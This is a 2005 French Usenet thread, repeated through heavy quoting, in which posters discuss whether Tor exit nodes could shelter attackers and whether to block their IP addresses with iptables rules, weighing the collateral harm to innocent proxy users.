l'utilisateur. Il existe une "black liste" de site chez les fournisseurs
et ils font de la sensure sans en avertir les internautes.
-+- DM in : Guide du Neuneu d'Usenet - FAI sournois avec le neuneu -+-
Le Mon, 14 Mar 2005 12:01:31 +0000, Fabien LE LEZ a écrit :
Y'a pas moyen d'envisager que le blocage des adresses IP correspondantes soient blacklistées par défaut sous Linux ?
Y'a moyen de l'envisager en effet si on arrive à trouver une liste des tous les noeud de sortie TOR. Mais pourquoi le mettre par défaut sous Linux ???
-- Il est évident que nombre de sites sont censuré à l'inssue de l'utilisateur. Il existe une "black liste" de site chez les fournisseurs et ils font de la sensure sans en avertir les internautes. -+- DM in : Guide du Neuneu d'Usenet - FAI sournois avec le neuneu -+-
J1
On 14 Mar 2005 11:45:03 GMT, J1 :
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal pour effectuer des attaques sur le net sans qu'il soit *possible* d'être inquiété...
Y'a pas moyen d'envisager que le blocage des adresses IP correspondantes soient blacklistées par défaut sous Linux ?
Oui effectivement, bloquer toutes les IPs des noeuds de sortie TOR via des regles ipchains ou iptables serait une solution, un peu laborieuse.
Existe t il des packages se chargeant de recuperer et de maintenir à jour une liste d'IPs utilisées comme "exit node" de TOR? L'idéal serait même de blacklister les noeuds de type (TOR, Mixmaster, etc.)
Un gros problème est de définir ce que contient le "etc". par exemple les attaques du type
passent très bien les serveurs proxies, et bon nombre de FAI proposent des proxies ; je suppose qu'ils ne loggent pas les requetes effectuées sur le long terme, vu la quantité de données que cela representerait.
Un hacker utiliserait un proxy d'un gros FAI et ensuite bon nombre "d'innocentes" personnes utilisant ces proxies ne pourraient plus accéder à mon serveur... Et il y a sans doute des cas bien plus complexes encore.
-- J1
On 14 Mar 2005 11:45:03 GMT, J1 <ji1.NOJUNK@free.fr>:
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal
pour effectuer des attaques sur le net sans qu'il soit *possible* d'être
inquiété...
Y'a pas moyen d'envisager que le blocage des adresses IP
correspondantes soient blacklistées par défaut sous Linux ?
Oui effectivement, bloquer toutes les IPs des noeuds de sortie TOR via
des regles ipchains ou iptables serait une solution, un peu laborieuse.
Existe t il des packages se chargeant de recuperer et de maintenir à
jour une liste d'IPs utilisées comme "exit node" de TOR?
L'idéal serait même de blacklister les noeuds de type (TOR, Mixmaster,
etc.)
Un gros problème est de définir ce que contient le "etc".
par exemple les attaques du type
passent très bien les serveurs proxies, et bon nombre de FAI proposent
des proxies ; je suppose qu'ils ne loggent pas les requetes effectuées
sur le long terme, vu la quantité de données que cela representerait.
Un hacker utiliserait un proxy d'un gros FAI et ensuite bon nombre
"d'innocentes" personnes utilisant ces proxies ne pourraient plus
accéder à mon serveur... Et il y a sans doute des cas bien plus
complexes encore.
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal pour effectuer des attaques sur le net sans qu'il soit *possible* d'être inquiété...
Y'a pas moyen d'envisager que le blocage des adresses IP correspondantes soient blacklistées par défaut sous Linux ?
Oui effectivement, bloquer toutes les IPs des noeuds de sortie TOR via des regles ipchains ou iptables serait une solution, un peu laborieuse.
Existe t il des packages se chargeant de recuperer et de maintenir à jour une liste d'IPs utilisées comme "exit node" de TOR? L'idéal serait même de blacklister les noeuds de type (TOR, Mixmaster, etc.)
Un gros problème est de définir ce que contient le "etc". par exemple les attaques du type
passent très bien les serveurs proxies, et bon nombre de FAI proposent des proxies ; je suppose qu'ils ne loggent pas les requetes effectuées sur le long terme, vu la quantité de données que cela representerait.
Un hacker utiliserait un proxy d'un gros FAI et ensuite bon nombre "d'innocentes" personnes utilisant ces proxies ne pourraient plus accéder à mon serveur... Et il y a sans doute des cas bien plus complexes encore.
